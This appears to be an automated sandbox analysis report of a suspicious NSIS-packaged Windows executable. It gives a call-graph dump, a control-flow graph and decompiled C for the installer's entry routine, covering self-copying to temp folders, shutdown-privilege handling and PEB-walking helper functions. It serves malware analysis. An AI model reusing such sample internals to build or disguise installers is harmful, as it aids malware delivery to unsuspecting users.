3686->3687 3687->3688 3688->3597 3688->3688 3690 405da3 3 API calls 3689->3690 3691 4035f7 3690->3691 3692 40360f 3691->3692 3694 4035fd 3691->3694 3693 40596c 3 API calls 3692->3693 3695 403630 3693->3695 3820 4059e3 wsprintfA 3694->3820 3697 40364e lstrcatA 3695->3697 3699 40596c 3 API calls 3695->3699 3698 40360d 3697->3698 3811 403897 3698->3811 3699->3697 3702 405659 18 API calls 3703 403676 3702->3703 3704 4036ff 3703->3704 3706 40596c 3 API calls 3703->3706 3705 405659 18 API calls 3704->3705 3707 403705 3705->3707 3708 4036a2 3706->3708 3709 403715 LoadImageA 3707->3709 3710 405aa7 18 API calls 3707->3710 3708->3704 3713 4036be lstrlenA 3708->3713 3717 4055a3 CharNextA 3708->3717 3711 403740 RegisterClassA 3709->3711 3712 4037c9 3709->3712 3710->3709 3714 40377c SystemParametersInfoA CreateWindowExA 3711->3714 3715 4037d3 3711->3715 3716 40140b 2 API calls 3712->3716 3718 4036f2 3713->3718 3719 4036cc lstrcmpiA 3713->3719 3714->3712 3715->3640 3720 4037cf 3716->3720 3722 4036bc 3717->3722 3721 405578 3 API calls 3718->3721 3719->3718 3723 4036dc GetFileAttributesA 3719->3723 3720->3715 3724 403897 19 API calls 3720->3724 3725 4036f8 3721->3725 3722->3713 3726 4036e8 3723->3726 3728 4037e0 3724->3728 3821 405a85 lstrcpynA 3725->3821 3726->3718 3727 4055bf 2 API calls 3726->3727 3727->3718 3730 403864 3728->3730 3731 4037e8 ShowWindow LoadLibraryA 3728->3731 3822 404ef5 OleInitialize 3730->3822 3732 403807 LoadLibraryA 3731->3732 3733 40380e GetClassInfoA 3731->3733 3732->3733 3735 403822 GetClassInfoA RegisterClassA 3733->3735 3736 403838 DialogBoxParamA 3733->3736 3735->3736 3738 40140b 2 API calls 3736->3738 3737 40386a 3739 403886 3737->3739 3740 40386e 3737->3740 3742 403860 3738->3742 3741 40140b 2 API calls 3739->3741 3740->3715 3743 40140b 2 API calls 3740->3743 3741->3715 3742->3715 3743->3715 3744->3586 3837 405a85 lstrcpynA 3745->3837 3747 40566a 3748 40560c 4 API calls 3747->3748 3749 405670 3748->3749 3750 4033e3 3749->3750 3751 405ce3 5 API calls 3749->3751 3750->3640 3759 405a85 lstrcpynA 3750->3759 3757 405680 3751->3757 3752 4056ab lstrlenA 3753 4056b6 3752->3753 3752->3757 3754 405578 3 API calls 3753->3754 3756 4056bb GetFileAttributesA 3754->3756 3755 405d7c 2 API calls 3755->3757 3756->3750 3757->3750 3757->3752 3757->3755 3758 4055bf 2 API calls 3757->3758 3758->3752 3759->3626 3760->3631 3762 4035c1 3761->3762 3763 4035b7 CloseHandle 3761->3763 3764 4035d5 3762->3764 3765 4035cb CloseHandle 3762->3765 3763->3762 3838 4053aa 3764->3838 3765->3764 3768->3618 3769->3642 3771 405da3 3 API calls 3770->3771 3772 4057de 3771->3772 3773 40583b GetShortPathNameA 3772->3773 3776 405930 3772->3776 3881 40575c GetFileAttributesA CreateFileA 3772->3881 3775 405850 3773->3775 3773->3776 3775->3776 3778 405858 wsprintfA 3775->3778 3776->3642 3777 40581f CloseHandle GetShortPathNameA 3777->3776 3780 405833 3777->3780 3779 405aa7 18 API calls 3778->3779 3781 405880 3779->3781 3780->3773 3780->3776 3882 40575c GetFileAttributesA CreateFileA 3781->3882 3783 40588d 3783->3776 3784 40589c GetFileSize GlobalAlloc 3783->3784 3785 405929 CloseHandle 3784->3785 3786 4058ba ReadFile 3784->3786 3785->3776 3786->3785 3787 4058ce 3786->3787 3787->3785 3883 4056d1 lstrlenA 3787->3883 3790 4058e3 3888 405a85 lstrcpynA 3790->3888 3791 40593d 3792 4056d1 4 API calls 3791->3792 3794 4058f1 3792->3794 3795 405904 SetFilePointer WriteFile GlobalFree 3794->3795 3795->3785 3797 405320 3796->3797 3798 405314 CloseHandle 3796->3798 3797->3642 3798->3797 3800 401389 2 API calls 3799->3800 3801 401420 3800->3801 3801->3606 3802->3661 3803->3663 3805 4055cc 3804->3805 3806 4055d1 CharPrevA 3805->3806 3807 402cc7 3805->3807 3806->3805 3806->3807 3808 405a85 lstrcpynA 3807->3808 3808->3667 3809->3678 3810->3686 3812 4038ab 3811->3812 3829 4059e3 wsprintfA 3812->3829 3814 40391c 3815 405aa7 18 API calls 3814->3815 3816 403928 SetWindowTextA 3815->3816 3817 403944 3816->3817 3818 40365e 3816->3818 3817->3818 3819 405aa7 18 API calls 3817->3819 3818->3702 3819->3817 3820->3698 3821->3704 3830 403e83 3822->3830 3824 404f3f 3825 403e83 SendMessageA 3824->3825 3826 404f51 OleUninitialize 3825->3826 3826->3737 3827 404f18 3827->3824 3833 401389 3827->3833 3829->3814 3831 403e9b 3830->3831 3832 403e8c SendMessageA 3830->3832 3831->3827 3832->3831 3835 401390 3833->3835 3834 4013fe 3834->3827 3835->3834 3836 4013cb MulDiv SendMessageA 3835->3836 3836->3835 3837->3747 3839 405659 18 API calls 3838->3839 3840 4053be 3839->3840 3841 4053c7 DeleteFileA 3840->3841 3842 4053de 3840->3842 3843 403416 OleUninitialize 3841->3843 3844 40551d 3842->3844 3879 405a85 lstrcpynA 3842->3879 3843->3604 3843->3605 3844->3843 3849 405d7c 2 API calls 3844->3849 3846 405408 3847 405419 3846->3847 3848 40540c lstrcatA 3846->3848 3850 4055bf 2 API calls 3847->3850 3852 40541f 3848->3852 3851 405538 3849->3851 3850->3852 3851->3843 3855 405578 3 API calls 3851->3855 3853 40542d lstrcatA 3852->3853 3854 405438 lstrlenA FindFirstFileA 3852->3854 3853->3854 3856 405513 3854->3856 3877 40545c 3854->3877 3857 405542 3855->3857 3856->3844 3859 40573d 2 API calls 3857->3859 3858 4055a3 CharNextA 3858->3877 3860 405548 RemoveDirectoryA 3859->3860 3861 405553 3860->3861 3862 40556a 3860->3862 3861->3843 3865 405559 3861->3865 3866 404e23 25 API calls 3862->3866 3863 4054f2 FindNextFileA 3867 40550a FindClose 3863->3867 3863->3877 3868 404e23 25 API calls 3865->3868 3866->3843 3867->3856 3869 405561 3868->3869 3870 4057d3 38 API calls 3869->3870 3873 405568 3870->3873 3871 40573d 2 API calls 3874 4054bf DeleteFileA 3871->3874 3872 4053aa 59 API calls 3872->3877 3873->3843 3874->3877 3875 404e23 25 API calls 3875->3863 3876 404e23 25 API calls 3876->3877 3877->3858 3877->3863 3877->3871 3877->3872 3877->3875 3877->3876 3878 4057d3 38 API calls 3877->3878 3880 405a85 lstrcpynA 3877->3880 3878->3877 3879->3846 3880->3877 3881->3777 3882->3783 3884 405707 lstrlenA 3883->3884 3885 405711 3884->3885 3886 4056e5 lstrcmpiA 3884->3886 3885->3790 3885->3791 3886->3885 3887 4056fe CharNextA 3886->3887 3887->3884 3888->3794 4740 401ca5 4741 4029cb 18 API calls 4740->4741 4742 401cb5 SetWindowLongA 4741->4742 4743 40287d 4742->4743 4744 401a26 4745 4029cb 18 API calls 4744->4745 4746 401a2c 4745->4746 4747 4029cb 18 API calls 4746->4747 4748 4019d6 4747->4748 4749 4045aa 4750 4045d6 4749->4750 4751 4045ba 4749->4751 4753 404609 4750->4753 4754 4045dc SHGetPathFromIDListA 4750->4754 4760 40532a GetDlgItemTextA 4751->4760 4756 4045f3 SendMessageA 4754->4756 4757 4045ec 4754->4757 4755 4045c7 SendMessageA 4755->4750 4756->4753 4758 40140b 2 API calls 4757->4758 4758->4756 4760->4755 4761 402b2d 4762 402b3c SetTimer 4761->4762 4764 402b55 4761->4764 4762->4764 4763 402ba3 4764->4763 4765 402ba9 MulDiv 4764->4765 4766 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4765->4766 4766->4763 4768 401bad 4769 4029cb 18 API calls 4768->4769 4770 401bb4 4769->4770 4771 4029cb 18 API calls 4770->4771 4772 401bbe 4771->4772 4773 401bce 4772->4773 4774 4029e8 18 API calls 4772->4774 4775 401bde 4773->4775 4776 4029e8 18 API calls 4773->4776 4774->4773 4777 401be9 4775->4777 4778 401c2d 4775->4778 4776->4775 4780 4029cb 18 API calls 4777->4780 4779 4029e8 18 API calls 4778->4779 4781 401c32 4779->4781 4782 401bee 4780->4782 4783 4029e8 18 API calls 4781->4783 4784 4029cb 18 API calls 4782->4784 4785 401c3b FindWindowExA 4783->4785 4786 401bf7 4784->4786 4789 401c59 4785->4789 4787 401c1d SendMessageA 4786->4787 4788 401bff SendMessageTimeoutA 4786->4788 4787->4789 4788->4789 4790 40422e 4791 404264 4790->4791 4792 40423e 4790->4792 4794 403e9e 8 API calls 4791->4794 4793 403e37 19 API calls 4792->4793 4795 40424b SetDlgItemTextA 4793->4795 4796 404270 4794->4796 4795->4791 4797 402630 4798 4029e8 18 API calls 4797->4798 4799 402637 FindFirstFileA 4798->4799 4800 40265a 4799->4800 4804 40264a 4799->4804 4801 402661 4800->4801 4805 4059e3 wsprintfA 4800->4805 4806 405a85 lstrcpynA 4801->4806 4805->4801 4806->4804 4814 4024b0 4815 4024b5 4814->4815 4816 4024c6 4814->4816 4818 4029cb 18 API calls 4815->4818 4817 4029e8 18 API calls 4816->4817 4819 4024cd lstrlenA 4817->4819 4820 4024bc 4818->4820 4819->4820 4821 40264e 4820->4821 4822 4024ec WriteFile 4820->4822 4822->4821 3436 4015b3 3437 4029e8 18 API calls 3436->3437 3438 4015ba 3437->3438 3454 40560c CharNextA CharNextA 3438->3454 3440 40160a 3441 40160f 3440->3441 3444 40162d 3440->3444 3443 401423 25 API calls 3441->3443 3442 4055a3 CharNextA 3445 4015d0 CreateDirectoryA 3442->3445 3448 401616 3443->3448 3449 401423 25 API calls 3444->3449 3446 4015c2 3445->3446 3447 4015e5 GetLastError 3445->3447 3446->3440 3446->3442 3447->3446 3450 4015f2 GetFileAttributesA 3447->3450 3460 405a85 lstrcpynA 3448->3460 3453 40215b 3449->3453 3450->3446 3452 401621 SetCurrentDirectoryA 3452->3453 3455 405626 3454->3455 3457 405632 3454->3457 3456 40562d CharNextA 3455->3456 3455->3457 3459 40564f 3456->3459 3458 4055a3 CharNextA 3457->3458 3457->3459 3458->3457 3459->3446 3460->3452 3461 401734 3462 4029e8 18 API calls 3461->3462 3463 40173b 3462->3463 3464 401761 3463->3464 3465 401759 3463->3465 3516 405a85 lstrcpynA 3464->3516 3515 405a85 lstrcpynA 3465->3515 3468 40175f 3472 405ce3 5 API calls 3468->3472 3469 40176c 3517 405578 lstrlenA CharPrevA 3469->3517 3484 40177e 3472->3484 3476 401795 CompareFileTime 3476->3484 3477 401859 3478 404e23 25 API calls 3477->3478 3480 401863 3478->3480 3479 404e23 25 API calls 3481 401845 3479->3481 3500 402f01 3480->3500 3484->3476 3484->3477 3487 405aa7 18 API calls 3484->3487 3491 405a85 lstrcpynA 3484->3491 3497 401830 3484->3497 3499 40575c GetFileAttributesA CreateFileA 3484->3499 3520 405d7c FindFirstFileA 3484->3520 3523 40573d GetFileAttributesA 3484->3523 3526 405346 3484->3526 3485 40188a SetFileTime 3486 40189c FindCloseChangeNotification 3485->3486 3486->3481 3488 4018ad 3486->3488 3487->3484 3489 4018b2 3488->3489 3490 4018c5 3488->3490 3492 405aa7 18 API calls 3489->3492 3493 405aa7 18 API calls 3490->3493 3491->3484 3494 4018ba lstrcatA 3492->3494 3495 4018cd 3493->3495 3494->3495 3498 405346 MessageBoxIndirectA 3495->3498 3497->3479 3497->3481 3498->3481 3499->3484 3501 402f12 SetFilePointer 3500->3501 3502 402f2e 3500->3502 3501->3502 3530 40302c GetTickCount 3502->3530 3505 402f3f ReadFile 3506 402f5f 3505->3506 3514 401876 3505->3514 3507 40302c 42 API calls 3506->3507 3506->3514 3508 402f76 3507->3508 3509 402ff1 ReadFile 3508->3509 3511 402f86 3508->3511 3508->3514 3509->3514 3512 402fa1 ReadFile 3511->3512 3513 402fba WriteFile 3511->3513 3511->3514 3512->3511 3512->3514 3513->3511 3513->3514 3514->3485 3514->3486 3515->3468 3516->3469 3518 405592 lstrcatA 3517->3518 3519 401772 lstrcatA 3517->3519 3518->3519 3519->3468 3521 405d92 FindClose 3520->3521 3522 405d9d 3520->3522 3521->3522 3522->3484 3524 405759 3523->3524 3525 40574c SetFileAttributesA 3523->3525 3524->3484 3525->3524 3527 40535b 3526->3527 3528 4053a7 3527->3528 3529 40536f MessageBoxIndirectA 3527->3529 3528->3484 3529->3528 3531 403196 3530->3531 3532 40305b 3530->3532 3533 402bc5 32 API calls 3531->3533 3543 4031da SetFilePointer 3532->3543 3539 402f37 3533->3539 3535 403066 SetFilePointer 3540 40308b 3535->3540 3539->3505 3539->3514 3540->3539 3541 403120 WriteFile 3540->3541 3542 403177 SetFilePointer 3540->3542 3544 4031a8 ReadFile 3540->3544 3546 405e9d 3540->3546 3553 402bc5 3540->3553 3541->3539 3541->3540 3542->3531 3543->3535 3545 4031c9 3544->3545 3545->3540 3547 405ec2 3546->3547 3550 405eca 3546->3550 3547->3540 3548 405f51 GlobalFree 3549 405f5a GlobalAlloc 3548->3549 3549->3547 3549->3550 3550->3547 3550->3548 3550->3549 3551 405fd1 GlobalAlloc 3550->3551 3552 405fc8 GlobalFree 3550->3552 3551->3547 3551->3550 3552->3551 3554 402bd3 3553->3554 3555 402beb 3553->3555 3558 402bdc DestroyWindow 3554->3558 3559 402be3 3554->3559 3556 402bf3 3555->3556 3557 402bfb GetTickCount 3555->3557 3568 405ddc 3556->3568 3557->3559 3561 402c09 3557->3561 3558->3559 3559->3540 3562 402c11 3561->3562 3563 402c3e CreateDialogParamA 3561->3563 3562->3559 3572 402ba9 3562->3572 3563->3559 3565 402c1f wsprintfA 3566 404e23 25 API calls 3565->3566 3567 402c3c 3566->3567 3567->3559 3569 405df9 PeekMessageA 3568->3569 3570 405e09 3569->3570 3571 405def DispatchMessageA 3569->3571 3570->3559 3571->3569 3573 402bb8 3572->3573 3574 402bba MulDiv 3572->3574 3573->3574 3574->3565 4823 401634 4824 4029e8 18 API calls 4823->4824 4825 40163a 4824->4825 4826 405d7c 2 API calls 4825->4826 4827 401640 4826->4827 4828 401934 4829 4029cb 18 API calls 4828->4829 4830 40193b 4829->4830 4831 4029cb 18 API calls 4830->4831 4832 401945 4831->4832 4833 4029e8 18 API calls 4832->4833 4834 40194e 4833->4834 4835 401961 lstrlenA 4834->4835 4836 40199c 4834->4836 4837 40196b 4835->4837 4837->4836 4841 405a85 lstrcpynA 4837->4841 4839 401985 4839->4836 4840 401992 lstrlenA 4839->4840 4840->4836 4841->4839 4842 4019b5 4843 4029e8 18 API calls 4842->4843 4844 4019bc 4843->4844 4845 4029e8 18 API calls 4844->4845 4846 4019c5 4845->4846 4847 4019cc lstrcmpiA 4846->4847 4848 4019de lstrcmpA 4846->4848 4849 4019d2 4847->4849 4848->4849 4850 4014b7 4851 4014bd 4850->4851 4852 401389 2 API calls 4851->4852 4853 4014c5 4852->4853 4854 19ece5 4859 19ebcf GetPEB 4854->4859 4856 19eeb2 4857 19ed4a 4857->4856 4860 19f1b6 4857->4860 4859->4857 4874 19ebcf GetPEB 4860->4874 4862 19f20d 4863 19f2f8 4862->4863 4865 19f305 4862->4865 4873 19f2bb 4862->4873 4864 19f4de 5 API calls 4863->4864 4864->4873 4866 19e76f 4 API calls 4865->4866 4865->4873 4868 19f40b 4866->4868 4867 19f478 4870 19e76f 4 API calls 4867->4870 4868->4867 4869 19e76f 4 API calls 4868->4869 4868->4873 4869->4868 4871 19f497 4870->4871 4872 19e6be 4 API calls 4871->4872 4871->4873 4872->4873 4873->4856 4874->4862 4875 4025be 4876 4025c5 4875->4876 4879 40282a 4875->4879 4877 4029cb 18 API calls 4876->4877 4878 4025d0 4877->4878 4880 4025d7 SetFilePointer 4878->4880 4880->4879 4881 4025e7 4880->4881 4883 4059e3 wsprintfA 4881->4883 4883->4879

                      Executed Functions

                      Function 00403225, Relevance: 73.8, APIs: 23, Strings: 19, Instructions: 270filestringcomCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 26 403393-4033aa DeleteFileA call 402c5b 16->26 27 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->27 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 38 40333f 20->38 24 403311-403317 21->24 25 403303-40330c 21->25 28 403327-40332e 24->28 29 403319-403322 24->29 25->24 32 40330e 25->32 39 403411-403420 call 4035a6 OleUninitialize 26->39 40 4033ac-4033b2 26->40 27->26 27->39 28->20 36 403348-403354 call 405a85 28->36 29->28 35 403324 29->35 32->24 35->28 36->16 38->11 50 403426-403436 call 405346 ExitProcess 39->50 51 40350b-403511 39->51 42 403401-403408 call 4035e3 40->42 43 4033b4-4033bd call 4055a3 40->43 48 40340d 42->48 54 4033c8-4033ca 43->54 48->39 52 403513-403530 call 405da3 * 3 51->52 53 40358e-403596 51->53 82 403532-403534 52->82 83 40357a-403585 ExitWindowsEx 52->83 57 403598 53->57 58 40359c-4035a0 ExitProcess 53->58 59 4033cc-4033d6 54->59 60 4033bf-4033c5 54->60 57->58 64 4033d8-4033e5 call 405659 59->64 65 40343c-403456 lstrcatA lstrcmpiA 59->65 60->59 63 4033c7 60->63 63->54 64->39 76 4033e7-4033fd call 405a85 * 2 64->76 65->39 68 403458-40346d CreateDirectoryA SetCurrentDirectoryA 65->68 71 40347a-403494 call 405a85 68->71 72 40346f-403475 call 405a85 68->72 81 403499-4034b5 call 405aa7 DeleteFileA 71->81 72->71 76->42 92 4034f6-4034fd 81->92 93 4034b7-4034c7 CopyFileA 81->93 82->83 87 403536-403538 82->87 83->53 86 403587-403589 call 40140b 83->86 86->53 87->83 91 40353a-40354c GetCurrentProcess 87->91 91->83 97 40354e-403570 91->97 92->81 95 4034ff-403506 call 4057d3 92->95 93->92 96 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->96 95->39 96->92 107 4034eb-4034f2 CloseHandle 96->107 97->83 107->92
                      C-Code - Quality: 83%
                      			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85("jefgbrzfgglybaslbprz Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34; // 0x0
											if(__eflags != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x423ebc; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\hardz\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t101);
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x423eb0; // 0x4de368
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												_t77 =  *0x423eb0; // 0x4de368
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                      0x00403231
                      0x00403235
                      0x0040323d
                      0x0040323f
                      0x00403244
                      0x0040324f
                      0x00403256
                      0x0040325e
                      0x00403268
                      0x0040327e
                      0x0040328e
                      0x00403293
                      0x00403299
                      0x004032a0
                      0x004032b3
                      0x004032b8
                      0x004032ba
                      0x004032bc
                      0x004032c1
                      0x004032c1
                      0x004032d1
                      0x004032d7
                      0x00403340
                      0x00403340
                      0x00403342
                      0x00403344
                      0x00000000
                      0x00000000
                      0x004032dd
                      0x004032e0
                      0x004032e8
                      0x004032e8
                      0x004032eb
                      0x004032f0
                      0x004032f2
                      0x004032f2
                      0x004032f3
                      0x004032f3
                      0x004032f8
                      0x004032fb
                      0x00403330
                      0x00403335
                      0x0040333a
                      0x0040333d
                      0x0040333f
                      0x0040333f
                      0x0040333f
                      0x00000000
                      0x004032fd
                      0x004032fd
                      0x004032fe
                      0x00403301
                      0x00403309
                      0x0040330c
                      0x0040330e
                      0x0040330e
                      0x0040330e
                      0x0040330c
                      0x00403311
                      0x00403317
                      0x0040331f
                      0x00403322
                      0x00403324
                      0x00403324
                      0x00403324
                      0x00403322
                      0x00403327
                      0x0040332e
                      0x00403348
                      0x0040334b
                      0x0040334b
                      0x00403354
                      0x00403359
                      0x00403359
                      0x00403364
                      0x0040336a
                      0x0040336f
                      0x00403371
                      0x00403393
                      0x00403398
                      0x0040339f
                      0x004033a6
                      0x004033aa
                      0x00403411
                      0x00403411
                      0x00403416
                      0x00403420
                      0x0040350b
                      0x00403511
                      0x0040351c
                      0x00403525
                      0x00403527
                      0x0040352c
                      0x0040352e
                      0x00403530
                      0x00403532
                      0x00403534
                      0x00403536
                      0x00403538
                      0x00403548
                      0x0040354a
                      0x0040354c
                      0x00403559
                      0x00403568
                      0x00403570
                      0x00403578
                      0x00403578
                      0x0040354c
                      0x00403538
                      0x00403534
                      0x0040357d
                      0x00403583
                      0x00403585
                      0x00403589
                      0x00403589
                      0x00403585
                      0x0040358e
                      0x00403593
                      0x00403596
                      0x00403598
                      0x00403598
                      0x004035a0
                      0x004035a0
                      0x0040342f
                      0x00403436
                      0x00403436
                      0x004033ac
                      0x004033b2
                      0x00403401
                      0x00403401
                      0x0040340d
                      0x00000000
                      0x0040340d
                      0x004033bb
                      0x004033c8
                      0x004033bf
                      0x004033c5
                      0x00000000
                      0x00000000
                      0x004033c7
                      0x004033c7
                      0x004033c7
                      0x004033cc
                      0x004033ce
                      0x004033d6
                      0x00403442
                      0x00403447
                      0x00403456
                      0x00000000
                      0x00000000
                      0x0040345a
                      0x00403461
                      0x00403467
                      0x0040346d
                      0x00403475
                      0x00403475
                      0x00403483
                      0x0040348a
                      0x00403493
                      0x00403499
                      0x00403499
                      0x004034a5
                      0x004034ab
                      0x004034b5
                      0x004034c9
                      0x004034ca
                      0x004034cb
                      0x004034d0
                      0x004034dc
                      0x004034e2
                      0x004034e9
                      0x004034ec
                      0x004034f2
                      0x004034f2
                      0x004034e9
                      0x004034f6
                      0x004034fc
                      0x004034fc
                      0x004034ff
                      0x00403500
                      0x00403501
                      0x00000000
                      0x00403501
                      0x004033d8
                      0x004033da
                      0x004033e5
                      0x00000000
                      0x00000000
                      0x004033ed
                      0x004033f8
                      0x004033fd
                      0x00000000
                      0x004033fd
                      0x00403379
                      0x00403385
                      0x0040338a
                      0x0040338f
                      0x00403391
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403391
                      0x00000000
                      0x0040332e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004032e2
                      0x004032e2
                      0x004032e2
                      0x004032e3
                      0x004032e3
                      0x00000000
                      0x004032e2
                      0x00000000

                      APIs
                      • #17.COMCTL32 ref: 00403244
                      • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                      • OleInitialize.OLE32(00000000), ref: 00403256
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
